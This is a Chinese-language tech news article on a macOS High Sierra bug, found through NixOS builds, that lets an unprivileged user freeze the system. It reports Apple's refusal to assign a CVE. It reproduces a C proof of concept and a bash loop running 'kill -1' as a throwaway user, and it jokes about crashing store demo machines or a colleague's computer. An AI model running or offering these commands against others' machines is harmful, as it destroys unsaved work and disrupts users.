當前位置:
首頁 > 科技 > MacOS High Sierra 發現漏洞,任何使用者都可輕易使系統當機

MacOS High Sierra 發現漏洞,任何使用者都可輕易使系統當機

MacOS High Sierra 發現漏洞,任何使用者都可輕易使系統當機

一位開放源碼開發者 Shea Levy向 Apple 通報最新的電腦操作系統 MacOS High Sierra 有一個天大的漏洞──任何沒有特權的使用者帳號都可以下 kill -1 指令癱瘓整個系統,使系統當機無法操作。意思是說,如果你到蘋果電腦的展場,任何人都可以輕易使展示的蘋果電腦當機。

事情是這樣的,一開始是另外一位開源開發者 Matthew Bauer 在 MacOS High Sierra 系統使用 NixOS這套開放原碼的套件管理程序時,發現會莫名其妙瞬間系統完全凍結,無法控制,於是提報這個狀況。許多人開始追查原因,一開始以為是 NixOS 自己的錯誤,然而追蹤到一個地方,就是 NixOS 在 build(從源代碼自動編譯成可執行檔的程序)App 時,NixOS 會使用一個低許可權使用者帳號來 build,當該低許可權帳號的工作都完成後,會下系統呼叫 syscall(SYS_kill, -1, SIGKILL, 0) 來清除該帳號所有行程(process)結束作業, 然而沒想到整個系統不管哪個使用者的行程都會一起刪除。

Shea Levy 提供以下的 C 語言範例:

test.c:#include <unistd.h>

#include <sys/syscall.h>

#include <signal.h>

#include <errno.h>

#include <string.h>

#include <stdio.h>

int main {

int result;

for (int i = 0; i < 200; i++) {

result = kill(-1, SIGKILL); // Also fails with `syscall(SYS_kill, -1, SIGKILL, 0);`

printf(「result:%i,errno:%i (%s)
」, result, errno, strerror(errno));

}

}

$ gcc test.c

$ sudo -i

# /usr/bin/sysadminctl -addUser -fullName 「Kill Test User」 -home /var/empty -addUser killtest

# cd /

# while true; do sudo -u killtest /bin/sh -c 「sleep 1 & ./a.out」; done

只要花大概幾分鐘的時間,就可以讓你的系統當機。另外還有 bash 命令稿版本如下:

$ sudo /usr/bin/sysadminctl -addUser -fullName 「Kill Test User」 -home /var/empty -addUser killtest

$ while true; do sudo -u killtest /bin/sh -c 「sleep 1 & kill -kill -1」; done

更進一步追查,另外一位程序設計師 Daniel Peebles 發現根本不用那麼麻煩,只要簡單使用 libc 的 kill 呼叫,還有 kill 系統指令,就可以輕鬆當掉整個系統,問題出在 MacOS High Sierra 系統核心 XNU kernel。

於是 Shea Levy 等人不但通報 NixOS 團隊,還通報蘋果公司,然而卻得到蘋果公司如此回應:「 We have not reserved a CVE for this issue as Apple is a CNA and does not see it as a security issue.」意思是說蘋果不認為這是一個安全性問題,所以不打算髮一個 CVE(Common Vulnerabilities and Exposures,常見漏洞與暴露弱點 )編號給這個問題。

是的,這是 local 端實體電腦的漏洞,而不是現在大家比較關注的網路漏洞,看似沒啥大不了,然而試想,除了你可在蘋果電腦商場把展示電腦弄當機,如果你看使用蘋果電腦的同學、同事不爽,就可以趁他離開座位不在時,輕易讓他目前的心血瞬間付之東流,而這到底算不算安全問題呢?

(首圖來源:蘋果)

如需獲取更多資訊,請關注微信公眾賬號:Technews科技新報

維基媒體協會理事、開源碼軟體創作者、音樂人,關心開放原碼軟硬體的發展,以及在創作上的應用。

Latest posts by Shoichi Chou

未經許可,任何媒體、網站或個人不得複製、轉載、或以其他方式使用本網站的內容,違者必究。

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 TechNews 的精彩文章:

台積電 7 納米製程恐滿載,海思尋求第 2 供應商支持
工作生活能平衡嗎?專家指兩者和平共處更重要
2018 年全球科技支出將超過 3 萬億美元,成長率優於 2017 年
「嘿,Siri」,語音助理背後隱藏的努力與心思
小米在中國台灣地區發布旗艦機 MIX 2,強調全面屏 2.0 四曲面光滑外觀

TAG:TechNews |